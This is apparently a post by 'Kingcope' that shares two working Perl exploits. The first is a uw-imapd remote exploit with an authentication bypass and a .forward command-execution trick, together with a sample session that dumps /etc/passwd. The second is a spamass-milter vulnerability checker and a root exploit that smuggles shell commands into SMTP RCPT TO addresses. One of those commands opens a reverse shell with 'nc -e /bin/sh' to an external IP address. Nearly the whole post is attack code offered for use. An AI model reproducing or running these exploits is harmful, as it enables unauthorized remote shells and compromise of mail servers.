Here are two goodies. 1.) uw-imapd < imap-2004b Remote Exploit 2.) Spamass-milter 0day vulnerability verifier + root exploit (at the bottom) WARNING: USE AT YOUR OWN RISK + YOU WON'T FIND MANY TARGETS FOR BOTHS VULNS, I VERIFIED. ---snip--- #!/usr/bin/perl # CVE-2005-0198 Exploit by Kingcope # Exploited in May 2010 # One can See from the imap Banner if the Server is Vulnerable: # Vulnerable (CRAM-MD5 supported and right IMAP4rev1 Version) is e.g.: # * OK [CAPABILITY IMAP4REV1 LOGIN-REFERRALS AUTH=CRAM-MD5 AUTH=LOGIN] localhost IMAP4rev1 2002.332 at Sun, 14 Mar 2010 20:40:09 +0000 (GMT) # You need a VALID username but NOT A VALID password # Relies on both uw-imapd (< imap-2004b) and a MTA like sendmail to be installed remotely (.forward trickery). # EXPLOIT SESSION: # #./imap.pl 192.168.2.17 kcope "cat /etc/passwd" #uw-imapd (< imap-2004b) remote exploit by Kingcope #* OK [CAPABILITY IMAP4REV1 LOGIN-REFERRALS AUTH=CRAM-MD5 AUTH=LOGIN] [192.168.2. #17] IMAP4rev1 2003.338 at Sun, 14 Mar 2010 23:53:53 +0000 (GMT) # #++ Break In 1 #A001 NO AUTHENTICATE CRAM-MD5 failed #A001 NO AUTHENTICATE CRAM-MD5 failed #A001 NO AUTHENTICATE CRAM-MD5 failed #A001 OK [CAPABILITY IMAP4REV1 IDLE NAMESPACE MAILBOX-REFERRALS BINARY UNSELECT S #CAN SORT THREAD=REFERENCES THREAD=ORDEREDSUBJECT MULTIAPPEND] User kcope authent #icated #++ SUCCESS 1 - Authenticated #++ Break In 2 #220 localhost.Belkin ESMTP Sendmail 8.12.9p2/8.12.9; Sun, 14 Mar 2010 23:54:08 G #MT #250 localhost.Belkin Hello [192.168.2.15], pleased to meet you #250 2.1.0 me@foobar.org... Sender ok #250 2.1.5 kcope@localhost.Belkin... Recipient ok #354 Enter mail, end with "." on a line by itself #250 2.0.0 o2ENs82U002757 Message accepted for delivery #++ Waiting for .forward file to be executed #A002 OK DELETE completed #A002 OK CREATE completed #+ Ready for argument #A002 OK APPEND completed #* 1 EXISTS #* 1 RECENT #* OK [UIDVALIDITY 1268610848] UID validity status #* OK [UIDNEXT 2] Predicted next UID #* NO [UIDNOTSTICKY] Non-permanent unique identifiers: /tmp/0wned #* FLAGS (\Answered \Flagged \Deleted \Draft \Seen) #* OK [PERMANENTFLAGS ()] Permanent flags #* OK [UNSEEN 1] first unseen message in /tmp/0wned #A002 OK [READ-ONLY] SELECT completed #* 1 FETCH (BODY[] {1334} #Date: Sun, 14 Mar 2010 23:54:08 +0000 #From: kcope@localhost.Belkin #Subject: /tmp/0wned #MIME-Version: 1.0 #Content-Type: TEXT/PLAIN; charset=US-ASCII # $FreeBSD: src/etc/master.passwd,v 1.25.2.6 2002/06/30 17:57:17 des Exp $ # #root:*:0:0:Charlie &:/root:/bin/csh #toor:*:0:0:Bourne-again Superuser:/root: #daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin #operator:*:2:5:System &:/:/sbin/nologin #bin:*:3:7:Binaries Commands and Source:/:/sbin/nologin #tty:*:4:65533:Tty Sandbox:/:/sbin/nologin #kmem:*:5:65533:KMem Sandbox:/:/sbin/nologin #games:*:7:13:Games pseudo-user:/usr/games:/sbin/nologin #news:*:8:8:News Subsystem:/:/sbin/nologin #man:*:9:9:Mister Man Pages:/usr/share/man:/sbin/nologin #sshd:*:22:22:Secure Shell Daemon:/var/empty:/sbin/nologin #smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/sbin/nologin #mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/sbin/nologin #bind:*:53:53:Bind Sandbox:/:/sbin/nologin #uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/libexec/uucp/uucico #xten:*:67:67:X-10 daemon:/usr/local/xten:/sbin/nologin #pop:*:68:6:Post Office Owner:/nonexistent:/sbin/nologin #www:*:80:80:World Wide Web Owner:/nonexistent:/sbin/nologin #nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin #kcope:*:1001:0:User &:/home/kcope:/bin/sh #) #* 1 FETCH (FLAGS (\Recent \Seen)) #A002 OK FETCH completed use Digest::HMAC_MD5 qw(hmac_md5_hex); use MIME::Base64; use IO::Socket::INET; print "uw-imapd (< imap-2004b) remote exploit by Kingcope\r\n"; if ($#ARGV != 2) { print "usage: imap.pl \n"; print "example: imap.pl www.target.com foouser \"cat /etc/services\"\n"; exit; } $host = $ARGV[0]; $command = $ARGV[2]; $|=1; $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => 143, Proto => 'tcp'); $resp = <$sock>; print $resp."\n"; print "++ Break In 1\n"; for ($k=0;$k<5;$k++) { print $sock "A001 AUTHENTICATE CRAM-MD5\r\n"; $resp = <$sock>; print $resp; if (index($resp, "+") != 0) { print "-- No CRAM-MD5 Authen supported .\n"; exit; } $user = $ARGV[1]; $secret = "waco"; @data = split(" ", $resp); chomp($data[1]); $stamp = $data[1]; $decoded_stamp = decode_base64($stamp); $hmac = hmac_md5_hex($decoded_stamp, $secret); $answer = encode_base64($user . ' ' . $hmac); chomp($answer); print $sock $answer . "\r\n"; $resp = <$sock>; print $resp; if (index($resp, "OK ") >= 0) { goto Authenticated; } } print "-- Could not bypass Authen .\n"; exit; Authenticated: print "++ SUCCESS 1 - Authenticated\n"; print "++ Break In 2\n"; $msg = "|\"/bin/sh -c '$command' > /tmp/0wned 2>&1;\""; print $sock "A002 DELETE .forward\r\n"; print $sock "A002 CREATE .forward\r\n"; print $sock "A002 APPEND .forward (\\Seen) {". length($msg) ."}\r\n" . $msg ."\r\n"; $sock2 = IO::Socket::INET->new(PeerAddr => $host, PeerPort => 25, Proto => 'tcp'); $resp = <$sock2>; print $resp; print $sock2 "HELO you\r\n"; $resp = <$sock2>; print $resp; @remhost = split(" ", $resp); print $sock2 "MAIL FROM: me\@foobar.org\r\n"; $resp = <$sock2>; print $resp; print $sock2 "RCPT TO: kcope\@$remhost[1]\r\n"; $resp = <$sock2>; print $resp; print $sock2 "DATA\r\n"; $resp = <$sock2>; print $resp; print $sock2 ".\r\n"; $resp = <$sock2>; print $resp; print "++ Waiting for .forward file to be executed\r\n"; sleep(3); print $sock "A002 SELECT /tmp/0wned\r\n"; $resp = <$sock>; print $resp; print $sock "A002 FETCH 1 BODY[]\r\n"; while(<$sock>) { print $_; } ---snip--- The following script will check if a remote server is vulnerable to the spamass-milter vulnerability. ---snip--- #!/usr/bin/perl # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # postfix_joker.pl # Postfix, Sendmail w/ spamass-milter Remote Root Exploit by Kingcope # March 2010 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # use IO::Socket; $|=1; $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => '25', Proto => 'tcp'); $x = <$sock>; print $x; print $sock "HELO you.com\r\n"; $xown = <$sock>; @hostname = split(" ", $xown); print $xown; print $sock "MAIL FROM: \r\n"; $x = <$sock>; print $x; print $sock "RCPT TO: postmaster\@$hostname[1]\r\n"; $x = <$sock>; print $x; print $sock "DATA\r\n"; $x = <$sock>; print $x; print $sock "XJS*C4JDBQADN1.NSBN3*2IDNEN*GTUBE-STANDARD-ANTI-UBE-TEST-EMAIL*C.34X\r\n"; print $sock "\r\n.\r\n"; $x = <$sock>; print $x; if (!($x =~ "Blocked by SpamAssassin")) { exit; } print "\n\n$ARGV[0] RUNS SPAMASS-MILTER!\n"; open LOGFILE, ">>log.txt"; print LOGFILE "\n\n$ARGV[0] RUNS SPAMASS-MILTER!\n"; close LOGFILE; $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => '25', Proto => 'tcp'); $x = <$sock>; print $x; print $sock "HELO you.com\r\n"; $xown = <$sock>; @hostname = split(" ", $xown); print $xown; print $sock "MAIL FROM: \r\n"; $x = <$sock>; print $x; print $sock "RCPT TO: postmaster+:(\"|pkill -HUP smtpd|\")\@$hostname[1]\r\n"; $x = <$sock>; if ($x=="") { print "\n\n$ARGV[0] IS VULNERABLE!\n"; open LOGFILE, ">>log.txt"; print LOGFILE "\n\n$ARGV[0] IS VULNERABLE!\n"; close LOGFILE; exit; } print $x; print $sock "RCPT TO: postmaster+(\"|pkill -HUP sendmail|\")\@$hostname[1]\r\n"; $x = <$sock>; if ($x=="") { print "\n\n$ARGV[0] IS VULNERABLE!\n"; open LOGFILE, ">>log.txt"; print LOGFILE "\n\n$ARGV[0] IS VULNERABLE!\n"; close LOGFILE; exit; } print $x; print $sock "QUIT\r\n"; while(<$sock>) { print; } ---snip--- Spamass-milter Root Exploit PoC ---snip--- #!/usr/bin/perl # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # postfix_joker.pl # Postfix, Sendmail w/ spamass-milter Remote Root Exploit by Kingcope # March 2010 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # use IO::Socket; $|=1; $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => '25', Proto => 'tcp'); $x = <$sock>; print $x; print $sock "HELO you.com\r\n"; $xown = <$sock>; @hostname = split(" ", $xown); print $xown; print $sock "MAIL FROM: \r\n"; $x = <$sock>; print $x; print $sock "RCPT TO: postmaster\@$hostname[1]\r\n"; $x = <$sock>; print $x; print $sock "DATA\r\n"; $x = <$sock>; print $x; print $sock "XJS*C4JDBQADN1.NSBN3*2IDNEN*GTUBE-STANDARD-ANTI-UBE-TEST-EMAIL*C.34X\r\n"; print $sock "\r\n.\r\n"; $x = <$sock>; print $x; if (!($x =~ "Blocked by SpamAssassin")) { exit; } $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => '25', Proto => 'tcp'); $x = <$sock>; print $x; print $sock "HELO you.com\r\n"; $xown = <$sock>; @hostname = split(" ", $xown); print $xown; print $sock "MAIL FROM: \r\n"; $x = <$sock>; print $x; print $sock "RCPT TO: postmaster+:(\"|nc -e /bin/sh 85.25.67.37 5555;sleep 1000|\")\@$hostname[1]\r\n"; # POSTFIX! $x = <$sock>; print $x; print $sock "RCPT TO: postmaster+(\"|nc -e /bin/sh 85.25.67.37 5555;sleep 1000|\")\@$hostname[1]\r\n"; # SENDMAIL! $x = <$sock>; print $x; print $sock "QUIT\r\n"; while(<$sock>) { print; } ---snip--- Cheers, Kingcope